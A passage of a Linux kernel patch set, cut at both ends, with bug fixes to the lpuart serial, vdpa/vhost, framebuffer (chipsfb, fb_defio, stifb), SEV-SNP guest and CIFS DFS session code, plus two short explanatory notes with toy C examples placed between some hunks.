+-	if (old && sport->lpuart_dma_rx_use) {
+-		del_timer_sync(&sport->lpuart_timer);
++	if (old && sport->lpuart_dma_rx_use)
+ 		lpuart_dma_rx_free(&sport->port);
+-	}
+ 
+ 	spin_lock_irqsave(&sport->port.lock, flags);
+ 
+@@ -2159,10 +2157,8 @@ lpuart32_set_termios(struct uart_port *port, struct ktermios *termios,
+ 	 * Since the timer function acquires sport->port.lock, stop it before
+ 	 * acquiring the same lock because otherwise del_timer_sync() can deadlock.
+ 	 */
+-	if (old && sport->lpuart_dma_rx_use) {
+-		del_timer_sync(&sport->lpuart_timer);
++	if (old && sport->lpuart_dma_rx_use)
+ 		lpuart_dma_rx_free(&sport->port);
+-	}
+ 
+ 	spin_lock_irqsave(&sport->port.lock, flags);
+ 
+@@ -2189,9 +2185,15 @@ lpuart32_set_termios(struct uart_port *port, struct ktermios *termios,
+ 	/* update the per-port timeout */
+ 	uart_update_timeout(port, termios->c_cflag, baud);
+ 
+-	/* wait transmit engin complete */
+-	lpuart32_write(&sport->port, 0, UARTMODIR);
+-	lpuart32_wait_bit_set(&sport->port, UARTSTAT, UARTSTAT_TC);
++	/*
++	 * LPUART Transmission Complete Flag may never be set while queuing a break
++	 * character, so skip waiting for transmission complete when UARTCTRL_SBK is
++	 * asserted.
++	 */
++	if (!(old_ctrl & UARTCTRL_SBK)) {
++		lpuart32_write(&sport->port, 0, UARTMODIR);
++		lpuart32_wait_bit_set(&sport->port, UARTSTAT, UARTSTAT_TC);
++	}
+ 
+ 	/* disable transmit and receive */
+ 	lpuart32_write(&sport->port, old_ctrl & ~(UARTCTRL_TE | UARTCTRL_RE),
+@@ -2962,7 +2964,6 @@ static int lpuart_suspend(struct device *dev)
+ 			 * cannot resume as expected, hence gracefully release the
+ 			 * Rx DMA path before suspend and start Rx DMA path on resume.
+ 			 */
+-			del_timer_sync(&sport->lpuart_timer);
+ 			lpuart_dma_rx_free(&sport->port);
+ 
+ 			/* Disable Rx DMA to use UART port as wakeup source */
+diff --git a/drivers/vdpa/mlx5/core/mlx5_vdpa.h b/drivers/vdpa/mlx5/core/mlx5_vdpa.h
+index 058fbe28107e9..25fc4120b618d 100644
+--- a/drivers/vdpa/mlx5/core/mlx5_vdpa.h
++++ b/drivers/vdpa/mlx5/core/mlx5_vdpa.h
+@@ -96,6 +96,7 @@ struct mlx5_vdpa_dev {
+ 	struct mlx5_control_vq cvq;
+ 	struct workqueue_struct *wq;
+ 	unsigned int group2asid[MLX5_VDPA_NUMVQ_GROUPS];
++	bool suspended;
+ };
+ 
+ int mlx5_vdpa_alloc_pd(struct mlx5_vdpa_dev *dev, u32 *pdn, u16 uid);
+diff --git a/drivers/vdpa/mlx5/net/mlx5_vnet.c b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+index 3a6dbbc6440d4..daac3ab314785 100644
+--- a/drivers/vdpa/mlx5/net/mlx5_vnet.c
++++ b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+@@ -2411,7 +2411,7 @@ static int mlx5_vdpa_change_map(struct mlx5_vdpa_dev *mvdev,
+ 	if (err)
+ 		goto err_mr;
+ 
+-	if (!(mvdev->status & VIRTIO_CONFIG_S_DRIVER_OK))
++	if (!(mvdev->status & VIRTIO_CONFIG_S_DRIVER_OK) || mvdev->suspended)
+ 		goto err_mr;
+ 
+ 	restore_channels_info(ndev);
+@@ -2579,6 +2579,7 @@ static int mlx5_vdpa_reset(struct vdpa_device *vdev)
+ 	clear_vqs_ready(ndev);
+ 	mlx5_vdpa_destroy_mr(&ndev->mvdev);
+ 	ndev->mvdev.status = 0;
++	ndev->mvdev.suspended = false;
+ 	ndev->cur_num_vqs = 0;
+ 	ndev->mvdev.cvq.received_desc = 0;
+ 	ndev->mvdev.cvq.completed_desc = 0;
+@@ -2815,6 +2816,8 @@ static int mlx5_vdpa_suspend(struct vdpa_device *vdev)
+ 	struct mlx5_vdpa_virtqueue *mvq;
+ 	int i;
+ 
++	mlx5_vdpa_info(mvdev, "suspending device\n");
++
+ 	down_write(&ndev->reslock);
+ 	ndev->nb_registered = false;
+ 	mlx5_notifier_unregister(mvdev->mdev, &ndev->nb);
+@@ -2824,6 +2827,7 @@ static int mlx5_vdpa_suspend(struct vdpa_device *vdev)
+ 		suspend_vq(ndev, mvq);
+ 	}
+ 	mlx5_vdpa_cvq_suspend(mvdev);
++	mvdev->suspended = true;
+ 	up_write(&ndev->reslock);
+ 	return 0;
+ }
+diff --git a/drivers/vdpa/vdpa_sim/vdpa_sim.c b/drivers/vdpa/vdpa_sim/vdpa_sim.c
+index cb88891b44a8c..61bde476cf9c8 100644
+--- a/drivers/vdpa/vdpa_sim/vdpa_sim.c
++++ b/drivers/vdpa/vdpa_sim/vdpa_sim.c
+@@ -66,6 +66,7 @@ static void vdpasim_vq_notify(struct vringh *vring)
+ static void vdpasim_queue_ready(struct vdpasim *vdpasim, unsigned int idx)
+ {
+ 	struct vdpasim_virtqueue *vq = &vdpasim->vqs[idx];
++	uint16_t last_avail_idx = vq->vring.last_avail_idx;
+ 
+ 	vringh_init_iotlb(&vq->vring, vdpasim->features, vq->num, false,
+ 			  (struct vring_desc *)(uintptr_t)vq->desc_addr,
+@@ -74,6 +75,18 @@ static void vdpasim_queue_ready(struct vdpasim *vdpasim, unsigned int idx)
+ 			  (struct vring_used *)
+ 			  (uintptr_t)vq->device_addr);
+ 
++	vq->vring.last_avail_idx = last_avail_idx;
++
++	/*
++	 * Since vdpa_sim does not support receiving inflight descriptors as a
++	 * destination of a migration, let's set both avail_idx and used_idx
++	 * the same at vq start.  This is how vhost-user works in a
++	 * VHOST_SET_VRING_BASE call.
++	 *
++	 * Although the simple fix is to set last_used_idx at
++	 * vdpasim_set_vq_state, it would be reset at vdpasim_queue_ready.
++	 */
++	vq->vring.last_used_idx = last_avail_idx;
+ 	vq->vring.notify = vdpasim_vq_notify;
+ }
+ 
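
The vdpa_sim comment above explains the intent; as a toy model, the fix amounts to saving last_avail_idx across the vring re-initialisation and mirroring it into last_used_idx, the same starting state a VHOST_SET_VRING_BASE call establishes (sketch only, no inflight descriptors assumed):

#include <stdio.h>

struct vring_state {
	unsigned short last_avail_idx;
	unsigned short last_used_idx;
};

static void queue_ready(struct vring_state *v)
{
	unsigned short saved = v->last_avail_idx;

	*v = (struct vring_state){ 0 };	/* vring re-init zeroes everything */
	v->last_avail_idx = saved;	/* restore the driver's position */
	v->last_used_idx = saved;	/* start with used == avail */
}

int main(void)
{
	struct vring_state v = { .last_avail_idx = 7 };

	queue_ready(&v);
	printf("avail=%u used=%u\n", v.last_avail_idx, v.last_used_idx);
	return 0;
}
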
+diff --git a/drivers/vdpa/virtio_pci/vp_vdpa.c b/drivers/vdpa/virtio_pci/vp_vdpa.c
+index 8fe267ca3e76f..281287fae89f1 100644
+--- a/drivers/vdpa/virtio_pci/vp_vdpa.c
++++ b/drivers/vdpa/virtio_pci/vp_vdpa.c
+@@ -645,8 +645,8 @@ static void vp_vdpa_remove(struct pci_dev *pdev)
+ 	struct virtio_pci_modern_device *mdev = NULL;
+ 
+ 	mdev = vp_vdpa_mgtdev->mdev;
+-	vp_modern_remove(mdev);
+ 	vdpa_mgmtdev_unregister(&vp_vdpa_mgtdev->mgtdev);
++	vp_modern_remove(mdev);
+ 	kfree(vp_vdpa_mgtdev->mgtdev.id_table);
+ 	kfree(mdev);
+ 	kfree(vp_vdpa_mgtdev);
+diff --git a/drivers/vhost/vdpa.c b/drivers/vhost/vdpa.c
+index ec32f785dfdec..b7657984dd8df 100644
+--- a/drivers/vhost/vdpa.c
++++ b/drivers/vhost/vdpa.c
+@@ -1134,6 +1134,7 @@ static int vhost_vdpa_alloc_domain(struct vhost_vdpa *v)
+ 
+ err_attach:
+ 	iommu_domain_free(v->domain);
++	v->domain = NULL;
+ 	return ret;
+ }
+ 
+@@ -1178,6 +1179,7 @@ static void vhost_vdpa_cleanup(struct vhost_vdpa *v)
+ 			vhost_vdpa_remove_as(v, asid);
+ 	}
+ 
++	vhost_vdpa_free_domain(v);
+ 	vhost_dev_cleanup(&v->vdev);
+ 	kfree(v->vdev.vqs);
+ }
+@@ -1250,7 +1252,6 @@ static int vhost_vdpa_release(struct inode *inode, struct file *filep)
+ 	vhost_vdpa_clean_irq(v);
+ 	vhost_vdpa_reset(v);
+ 	vhost_dev_stop(&v->vdev);
+-	vhost_vdpa_free_domain(v);
+ 	vhost_vdpa_config_put(v);
+ 	vhost_vdpa_cleanup(v);
+ 	mutex_unlock(&d->mutex);
+diff --git a/drivers/video/fbdev/chipsfb.c b/drivers/video/fbdev/chipsfb.c
+index cc37ec3f8fc1f..7799d52a651f3 100644
+--- a/drivers/video/fbdev/chipsfb.c
++++ b/drivers/video/fbdev/chipsfb.c
+@@ -358,16 +358,21 @@ static int chipsfb_pci_init(struct pci_dev *dp, const struct pci_device_id *ent)
+ 	if (rc)
+ 		return rc;
+ 
+-	if (pci_enable_device(dp) < 0) {
++	rc = pci_enable_device(dp);
++	if (rc < 0) {
+ 		dev_err(&dp->dev, "Cannot enable PCI device\n");
+ 		goto err_out;
+ 	}
+ 
+-	if ((dp->resource[0].flags & IORESOURCE_MEM) == 0)
++	if ((dp->resource[0].flags & IORESOURCE_MEM) == 0) {
++		rc = -ENODEV;
+ 		goto err_disable;
++	}
+ 	addr = pci_resource_start(dp, 0);
+-	if (addr == 0)
++	if (addr == 0) {
++		rc = -ENODEV;
+ 		goto err_disable;
++	}
+ 
+ 	p = framebuffer_alloc(0, &dp->dev);
+ 	if (p == NULL) {
+@@ -417,7 +422,8 @@ static int chipsfb_pci_init(struct pci_dev *dp, const struct pci_device_id *ent)
+ 
+ 	init_chips(p, addr);
+ 
+-	if (register_framebuffer(p) < 0) {
++	rc = register_framebuffer(p);
++	if (rc < 0) {
+ 		dev_err(&dp->dev,"C&T 65550 framebuffer failed to register\n");
+ 		goto err_unmap;
+ 	}
+diff --git a/drivers/video/fbdev/core/fb_defio.c b/drivers/video/fbdev/core/fb_defio.c
+index 583cbcf094467..a3cf1f764f29b 100644
+--- a/drivers/video/fbdev/core/fb_defio.c
++++ b/drivers/video/fbdev/core/fb_defio.c
+@@ -309,17 +309,18 @@ void fb_deferred_io_open(struct fb_info *info,
+ 			 struct inode *inode,
+ 			 struct file *file)
+ {
++	struct fb_deferred_io *fbdefio = info->fbdefio;
++
+ 	file->f_mapping->a_ops = &fb_deferred_io_aops;
++	fbdefio->open_count++;
+ }
+ EXPORT_SYMBOL_GPL(fb_deferred_io_open);
+ 
+-void fb_deferred_io_release(struct fb_info *info)
++static void fb_deferred_io_lastclose(struct fb_info *info)
+ {
+-	struct fb_deferred_io *fbdefio = info->fbdefio;
+ 	struct page *page;
+ 	int i;
+ 
+-	BUG_ON(!fbdefio);
+ 	cancel_delayed_work_sync(&info->deferred_work);
+ 
+ 	/* clear out the mapping that we setup */
+@@ -328,13 +329,21 @@ void fb_deferred_io_release(struct fb_info *info)
+ 		page->mapping = NULL;
+ 	}
+ }
++
++void fb_deferred_io_release(struct fb_info *info)
++{
++	struct fb_deferred_io *fbdefio = info->fbdefio;
++
++	if (!--fbdefio->open_count)
++		fb_deferred_io_lastclose(info);
++}
+ EXPORT_SYMBOL_GPL(fb_deferred_io_release);
+ 
+ void fb_deferred_io_cleanup(struct fb_info *info)
+ {
+ 	struct fb_deferred_io *fbdefio = info->fbdefio;
+ 
+-	fb_deferred_io_release(info);
++	fb_deferred_io_lastclose(info);
+ 
+ 	kvfree(info->pagerefs);
+ 	mutex_destroy(&fbdefio->lock);
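
The fb_defio split above turns release into plain reference counting: teardown of the page mapping only runs on the last close, while fb_deferred_io_cleanup() (driver unload) calls the lastclose helper directly. Reduced to its skeleton:

#include <stdio.h>

static int open_count;

static void lastclose(void)
{
	puts("teardown");	/* cancel work, clear page->mapping */
}

static void fb_open(void)
{
	open_count++;
}

static void fb_release(void)
{
	if (!--open_count)
		lastclose();
}

int main(void)
{
	fb_open();
	fb_open();
	fb_release();	/* second opener still active: no teardown */
	fb_release();	/* prints "teardown" */
	return 0;
}
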
+diff --git a/drivers/video/fbdev/stifb.c b/drivers/video/fbdev/stifb.c
+index 3feb6e40d56d8..ef8a4c5fc6875 100644
+--- a/drivers/video/fbdev/stifb.c
++++ b/drivers/video/fbdev/stifb.c
+@@ -921,6 +921,28 @@ SETUP_HCRX(struct stifb_info *fb)
+ 
+ /* ------------------- driver specific functions --------------------------- */
+ 
++static int
++stifb_check_var(struct fb_var_screeninfo *var, struct fb_info *info)
++{
++	struct stifb_info *fb = container_of(info, struct stifb_info, info);
++
++	if (var->xres != fb->info.var.xres ||
++	    var->yres != fb->info.var.yres ||
++	    var->bits_per_pixel != fb->info.var.bits_per_pixel)
++		return -EINVAL;
++
++	var->xres_virtual = var->xres;
++	var->yres_virtual = var->yres;
++	var->xoffset = 0;
++	var->yoffset = 0;
++	var->grayscale = fb->info.var.grayscale;
++	var->red.length = fb->info.var.red.length;
++	var->green.length = fb->info.var.green.length;
++	var->blue.length = fb->info.var.blue.length;
++
++	return 0;
++}
++
+ static int
+ stifb_setcolreg(u_int regno, u_int red, u_int green,
+ 	      u_int blue, u_int transp, struct fb_info *info)
+@@ -1145,6 +1167,7 @@ stifb_init_display(struct stifb_info *fb)
+ 
+ static const struct fb_ops stifb_ops = {
+ 	.owner		= THIS_MODULE,
++	.fb_check_var	= stifb_check_var,
+ 	.fb_setcolreg	= stifb_setcolreg,
+ 	.fb_blank	= stifb_blank,
+ 	.fb_fillrect	= stifb_fillrect,
+@@ -1164,6 +1187,7 @@ static int __init stifb_init_fb(struct sti_struct *sti, int bpp_pref)
+ 	struct stifb_info *fb;
+ 	struct fb_info *info;
+ 	unsigned long sti_rom_address;
++	char modestr[32];
+ 	char *dev_name;
+ 	int bpp, xres, yres;
+ 
+@@ -1342,6 +1366,9 @@ static int __init stifb_init_fb(struct sti_struct *sti, int bpp_pref)
+ 	info->flags = FBINFO_HWACCEL_COPYAREA | FBINFO_HWACCEL_FILLRECT;
+ 	info->pseudo_palette = &fb->pseudo_palette;
+ 
++	scnprintf(modestr, sizeof(modestr), "%dx%d-%d", xres, yres, bpp);
++	fb_find_mode(&info->var, info, modestr, NULL, 0, NULL, bpp);
++
+ 	/* This has to be done !!! */
+ 	if (fb_alloc_cmap(&info->cmap, NR_PALETTE, 0))
+ 		goto out_err1;
+diff --git a/drivers/virt/coco/sev-guest/sev-guest.c b/drivers/virt/coco/sev-guest/sev-guest.c
+index 7b4e9009f3355..46f1a8d558b0b 100644
+--- a/drivers/virt/coco/sev-guest/sev-guest.c
++++ b/drivers/virt/coco/sev-guest/sev-guest.c
+@@ -31,6 +31,9 @@
+ #define AAD_LEN		48
+ #define MSG_HDR_VER	1
+ 
++#define SNP_REQ_MAX_RETRY_DURATION	(60*HZ)
++#define SNP_REQ_RETRY_DELAY		(2*HZ)
++
+ struct snp_guest_crypto {
+ 	struct crypto_aead *tfm;
+ 	u8 *iv, *authtag;
+@@ -318,26 +321,14 @@ static int enc_payload(struct snp_guest_dev *snp_dev, u64 seqno, int version, u8
+ 	return __enc_payload(snp_dev, req, payload, sz);
+ }
+ 
+-static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, int msg_ver,
+-				u8 type, void *req_buf, size_t req_sz, void *resp_buf,
+-				u32 resp_sz, __u64 *fw_err)
++static int __handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, __u64 *fw_err)
+ {
+-	unsigned long err;
+-	u64 seqno;
++	unsigned long err = 0xff, override_err = 0;
++	unsigned long req_start = jiffies;
++	unsigned int override_npages = 0;
+ 	int rc;
+ 
+-	/* Get message sequence and verify that its a non-zero */
+-	seqno = snp_get_msg_seqno(snp_dev);
+-	if (!seqno)
+-		return -EIO;
+-
+-	memset(snp_dev->response, 0, sizeof(struct snp_guest_msg));
+-
+-	/* Encrypt the userspace provided payload */
+-	rc = enc_payload(snp_dev, seqno, msg_ver, type, req_buf, req_sz);
+-	if (rc)
+-		return rc;
+-
++retry_request:
+ 	/*
+ 	 * Call firmware to process the request. In this function the encrypted
+ 	 * message enters shared memory with the host. So after this call the
+@@ -345,18 +336,24 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 	 * prevent reuse of the IV.
+ 	 */
+ 	rc = snp_issue_guest_request(exit_code, &snp_dev->input, &err);
++	switch (rc) {
++	case -ENOSPC:
++		/*
++		 * If the extended guest request fails due to having too
++		 * small of a certificate data buffer, retry the same
++		 * guest request without the extended data request in
++		 * order to increment the sequence number and thus avoid
++		 * IV reuse.
++		 */
++		override_npages = snp_dev->input.data_npages;
++		exit_code	= SVM_VMGEXIT_GUEST_REQUEST;
+ 
+-	/*
+-	 * If the extended guest request fails due to having too small of a
+-	 * certificate data buffer, retry the same guest request without the
+-	 * extended data request in order to increment the sequence number
+-	 * and thus avoid IV reuse.
+-	 */
+-	if (exit_code == SVM_VMGEXIT_EXT_GUEST_REQUEST &&
+-	    err == SNP_GUEST_REQ_INVALID_LEN) {
+-		const unsigned int certs_npages = snp_dev->input.data_npages;
+-
+-		exit_code = SVM_VMGEXIT_GUEST_REQUEST;
++		/*
++		 * Override the error to inform callers that the given extended
++		 * request buffer size was too small and give the caller the
++		 * required buffer size.
++		 */
++		override_err	= SNP_GUEST_REQ_INVALID_LEN;
+ 
+ 		/*
+ 		 * If this call to the firmware succeeds, the sequence number can
+@@ -366,15 +363,20 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 		 * of the VMPCK and the error code being propagated back to the
+ 		 * user as an ioctl() return code.
+ 		 */
+-		rc = snp_issue_guest_request(exit_code, &snp_dev->input, &err);
++		goto retry_request;
+ 
+-		/*
+-		 * Override the error to inform callers the given extended
+-		 * request buffer size was too small and give the caller the
+-		 * required buffer size.
+-		 */
+-		err = SNP_GUEST_REQ_INVALID_LEN;
+-		snp_dev->input.data_npages = certs_npages;
++	/*
++	 * The host may return SNP_GUEST_REQ_ERR_EBUSY if the request has been
++	 * throttled. Retry in the driver to avoid returning and reusing the
++	 * message sequence number on a different message.
++	 */
++	case -EAGAIN:
++		if (jiffies - req_start > SNP_REQ_MAX_RETRY_DURATION) {
++			rc = -ETIMEDOUT;
++			break;
++		}
++		schedule_timeout_killable(SNP_REQ_RETRY_DELAY);
++		goto retry_request;
+ 	}
+ 
+ 	/*
+@@ -386,7 +388,10 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 	snp_inc_msg_seqno(snp_dev);
+ 
+ 	if (fw_err)
+-		*fw_err = err;
++		*fw_err = override_err ?: err;
++
++	if (override_npages)
++		snp_dev->input.data_npages = override_npages;
+ 
+ 	/*
+ 	 * If an extended guest request was issued and the supplied certificate
+@@ -394,29 +399,49 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 	 * prevent IV reuse. If the standard request was successful, return -EIO
+ 	 * back to the caller as would have originally been returned.
+ 	 */
+-	if (!rc && err == SNP_GUEST_REQ_INVALID_LEN)
++	if (!rc && override_err == SNP_GUEST_REQ_INVALID_LEN)
++		return -EIO;
++
++	return rc;
++}
++
++static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, int msg_ver,
++				u8 type, void *req_buf, size_t req_sz, void *resp_buf,
++				u32 resp_sz, __u64 *fw_err)
++{
++	u64 seqno;
++	int rc;
++
++	/* Get the message sequence number and verify that it is non-zero */
++	seqno = snp_get_msg_seqno(snp_dev);
++	if (!seqno)
+ 		return -EIO;
+ 
++	memset(snp_dev->response, 0, sizeof(struct snp_guest_msg));
++
++	/* Encrypt the userspace provided payload */
++	rc = enc_payload(snp_dev, seqno, msg_ver, type, req_buf, req_sz);
++	if (rc)
++		return rc;
++
++	rc = __handle_guest_request(snp_dev, exit_code, fw_err);
+ 	if (rc) {
+-		dev_alert(snp_dev->dev,
+-			  "Detected error from ASP request. rc: %d, fw_err: %llu\n",
+-			  rc, *fw_err);
+-		goto disable_vmpck;
++		if (rc == -EIO && *fw_err == SNP_GUEST_REQ_INVALID_LEN)
++			return rc;
++
++		dev_alert(snp_dev->dev, "Detected error from ASP request. rc: %d, fw_err: %llu\n", rc, *fw_err);
++		snp_disable_vmpck(snp_dev);
++		return rc;
+ 	}
+ 
+ 	rc = verify_and_dec_payload(snp_dev, resp_buf, resp_sz);
+ 	if (rc) {
+-		dev_alert(snp_dev->dev,
+-			  "Detected unexpected decode failure from ASP. rc: %d\n",
+-			  rc);
+-		goto disable_vmpck;
++		dev_alert(snp_dev->dev, "Detected unexpected decode failure from ASP. rc: %d\n", rc);
++		snp_disable_vmpck(snp_dev);
++		return rc;
+ 	}
+ 
+ 	return 0;
+-
+-disable_vmpck:
+-	snp_disable_vmpck(snp_dev);
+-	return rc;
+ }
+ 
+ static int get_report(struct snp_guest_dev *snp_dev, struct snp_guest_request_ioctl *arg)
+@@ -703,6 +728,9 @@ static int __init sev_guest_probe(struct platform_device *pdev)
+ 	void __iomem *mapping;
+ 	int ret;
+ 
++	if (!cc_platform_has(CC_ATTR_GUEST_SEV_SNP))
++		return -ENODEV;
++
+ 	if (!dev->platform_data)
+ 		return -ENODEV;
+ 
+diff --git a/fs/cifs/cifs_debug.c b/fs/cifs/cifs_debug.c
+index 56b23def4c95d..d9876bd396fd4 100644
+--- a/fs/cifs/cifs_debug.c
++++ b/fs/cifs/cifs_debug.c
+@@ -419,6 +419,11 @@ skip_rdma:
+ 				   from_kuid(&init_user_ns, ses->linux_uid),
+ 				   from_kuid(&init_user_ns, ses->cred_uid));
+ 
++			if (ses->dfs_root_ses) {
++				seq_printf(m, "\n\tDFS root session id: 0x%llx",
++					   ses->dfs_root_ses->Suid);
++			}
++
+ 			spin_lock(&ses->chan_lock);
+ 			if (CIFS_CHAN_NEEDS_RECONNECT(ses, 0))
+ 				seq_puts(m, "\tPrimary channel: DISCONNECTED ");
+diff --git a/fs/cifs/cifs_dfs_ref.c b/fs/cifs/cifs_dfs_ref.c
+index 2b1a8d55b4ec4..cb40074feb3e9 100644
+--- a/fs/cifs/cifs_dfs_ref.c
++++ b/fs/cifs/cifs_dfs_ref.c
+@@ -179,6 +179,7 @@ static struct vfsmount *cifs_dfs_do_automount(struct path *path)
+ 	tmp.source = full_path;
+ 	tmp.leaf_fullpath = NULL;
+ 	tmp.UNC = tmp.prepath = NULL;
++	tmp.dfs_root_ses = NULL;
+ 
+ 	rc = smb3_fs_context_dup(ctx, &tmp);
+ 	if (rc) {
+diff --git a/fs/cifs/cifs_fs_sb.h b/fs/cifs/cifs_fs_sb.h
+index 013a4bd65280c..6517591922801 100644
+--- a/fs/cifs/cifs_fs_sb.h
++++ b/fs/cifs/cifs_fs_sb.h
+@@ -61,8 +61,6 @@ struct cifs_sb_info {
+ 	/* only used when CIFS_MOUNT_USE_PREFIX_PATH is set */
+ 	char *prepath;
+ 
+-	/* randomly generated 128-bit number for indexing dfs mount groups in referral cache */
+-	uuid_t dfs_mount_id;
+ 	/*
+ 	 * Indicate whether serverino option was turned off later
+ 	 * (cifs_autodisable_serverino) in order to match new mounts.
+diff --git a/fs/cifs/cifsglob.h b/fs/cifs/cifsglob.h
+index cfdd5bf701a1c..5aaaa47dea410 100644
+--- a/fs/cifs/cifsglob.h
++++ b/fs/cifs/cifsglob.h
+@@ -1239,6 +1239,7 @@ struct cifs_tcon {
+ 	/* BB add field for back pointer to sb struct(s)? */
+ #ifdef CONFIG_CIFS_DFS_UPCALL
+ 	struct list_head ulist; /* cache update list */
++	struct list_head dfs_ses_list;
+ #endif
+ 	struct delayed_work	query_interfaces; /* query interfaces workqueue job */
+ };
+@@ -1767,9 +1768,8 @@ struct cifs_mount_ctx {
+ 	struct TCP_Server_Info *server;
+ 	struct cifs_ses *ses;
+ 	struct cifs_tcon *tcon;
+-	struct cifs_ses *root_ses;
+-	uuid_t mount_id;
+ 	char *origin_fullpath, *leaf_fullpath;
++	struct list_head dfs_ses_list;
+ };
+ 
+ static inline void free_dfs_info_param(struct dfs_info3_param *param)
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index af49ae53aaf40..5a889f5f5c3e5 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -2278,6 +2278,7 @@ cifs_get_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ 	 * need to lock before changing something in the session.
+ 	 */
+ 	spin_lock(&cifs_tcp_ses_lock);
++	ses->dfs_root_ses = ctx->dfs_root_ses;
+ 	list_add(&ses->smb_ses_list, &server->smb_ses_list);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ 
+@@ -3456,7 +3457,8 @@ int cifs_mount(struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx)
+ 	bool isdfs;
+ 	int rc;
+ 
+-	uuid_gen(&mnt_ctx.mount_id);
++	INIT_LIST_HEAD(&mnt_ctx.dfs_ses_list);
++
+ 	rc = dfs_mount_share(&mnt_ctx, &isdfs);
+ 	if (rc)
+ 		goto error;
+@@ -3476,7 +3478,6 @@ int cifs_mount(struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx)
+ 	kfree(cifs_sb->prepath);
+ 	cifs_sb->prepath = ctx->prepath;
+ 	ctx->prepath = NULL;
+-	uuid_copy(&cifs_sb->dfs_mount_id, &mnt_ctx.mount_id);
+ 
+ out:
+ 	cifs_try_adding_channels(cifs_sb, mnt_ctx.ses);
+@@ -3488,7 +3489,7 @@ out:
+ 	return rc;
+ 
+ error:
+-	dfs_cache_put_refsrv_sessions(&mnt_ctx.mount_id);
++	dfs_put_root_smb_sessions(&mnt_ctx.dfs_ses_list);
+ 	kfree(mnt_ctx.origin_fullpath);
+ 	kfree(mnt_ctx.leaf_fullpath);
+ 	cifs_mount_put_conns(&mnt_ctx);
+@@ -3686,9 +3687,6 @@ cifs_umount(struct cifs_sb_info *cifs_sb)
+ 	spin_unlock(&cifs_sb->tlink_tree_lock);
+ 
+ 	kfree(cifs_sb->prepath);
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	dfs_cache_put_refsrv_sessions(&cifs_sb->dfs_mount_id);
+-#endif
+ 	call_rcu(&cifs_sb->rcu, delayed_free);
+ }
+ 
+diff --git a/fs/cifs/dfs.c b/fs/cifs/dfs.c
+index b64d20374b9c8..c8bda52fa096c 100644
+--- a/fs/cifs/dfs.c
++++ b/fs/cifs/dfs.c
+@@ -95,25 +95,31 @@ static int get_session(struct cifs_mount_ctx *mnt_ctx, const char *full_path)
+ 	ctx->leaf_fullpath = (char *)full_path;
+ 	rc = cifs_mount_get_session(mnt_ctx);
+ 	ctx->leaf_fullpath = NULL;
+-	if (!rc) {
+-		struct cifs_ses *ses = mnt_ctx->ses;
+ 
+-		mutex_lock(&ses->session_mutex);
+-		ses->dfs_root_ses = mnt_ctx->root_ses;
+-		mutex_unlock(&ses->session_mutex);
+-	}
+ 	return rc;
+ }
+ 
+-static void set_root_ses(struct cifs_mount_ctx *mnt_ctx)
++static int get_root_smb_session(struct cifs_mount_ctx *mnt_ctx)
+ {
+-	if (mnt_ctx->ses) {
++	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
++	struct dfs_root_ses *root_ses;
++	struct cifs_ses *ses = mnt_ctx->ses;
++
++	if (ses) {
++		root_ses = kmalloc(sizeof(*root_ses), GFP_KERNEL);
++		if (!root_ses)
++			return -ENOMEM;
++
++		INIT_LIST_HEAD(&root_ses->list);
++
+ 		spin_lock(&cifs_tcp_ses_lock);
+-		mnt_ctx->ses->ses_count++;
++		ses->ses_count++;
+ 		spin_unlock(&cifs_tcp_ses_lock);
+-		dfs_cache_add_refsrv_session(&mnt_ctx->mount_id, mnt_ctx->ses);
++		root_ses->ses = ses;
++		list_add_tail(&root_ses->list, &mnt_ctx->dfs_ses_list);
+ 	}
+-	mnt_ctx->root_ses = mnt_ctx->ses;
++	ctx->dfs_root_ses = ses;
++	return 0;
+ }
+ 
+ static int get_dfs_conn(struct cifs_mount_ctx *mnt_ctx, const char *ref_path, const char *full_path,
+@@ -121,7 +127,8 @@ static int get_dfs_conn(struct cifs_mount_ctx *mnt_ctx, const char *ref_path, co
+ {
+ 	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+ 	struct dfs_info3_param ref = {};
+-	int rc;
++	bool is_refsrv = false;
++	int rc, rc2;
+ 
+ 	rc = dfs_cache_get_tgt_referral(ref_path + 1, tit, &ref);
+ 	if (rc)
+@@ -136,8 +143,7 @@ static int get_dfs_conn(struct cifs_mount_ctx *mnt_ctx, const char *ref_path, co
+ 	if (rc)
+ 		goto out;
+ 
+-	if (ref.flags & DFSREF_REFERRAL_SERVER)
+-		set_root_ses(mnt_ctx);
++	is_refsrv = !!(ref.flags & DFSREF_REFERRAL_SERVER);
+ 
+ 	rc = -EREMOTE;
+ 	if (ref.flags & DFSREF_STORAGE_SERVER) {
+@@ -146,13 +152,17 @@ static int get_dfs_conn(struct cifs_mount_ctx *mnt_ctx, const char *ref_path, co
+ 			goto out;
+ 
+ 		/* some servers may not advertise referral capability under ref.flags */
+-		if (!(ref.flags & DFSREF_REFERRAL_SERVER) &&
+-		    is_tcon_dfs(mnt_ctx->tcon))
+-			set_root_ses(mnt_ctx);
++		is_refsrv |= is_tcon_dfs(mnt_ctx->tcon);
+ 
+ 		rc = cifs_is_path_remote(mnt_ctx);
+ 	}
+ 
++	if (rc == -EREMOTE && is_refsrv) {
++		rc2 = get_root_smb_session(mnt_ctx);
++		if (rc2)
++			rc = rc2;
++	}
++
+ out:
+ 	free_dfs_info_param(&ref);
+ 	return rc;
+@@ -165,6 +175,7 @@ static int __dfs_mount_share(struct cifs_mount_ctx *mnt_ctx)
+ 	char *ref_path = NULL, *full_path = NULL;
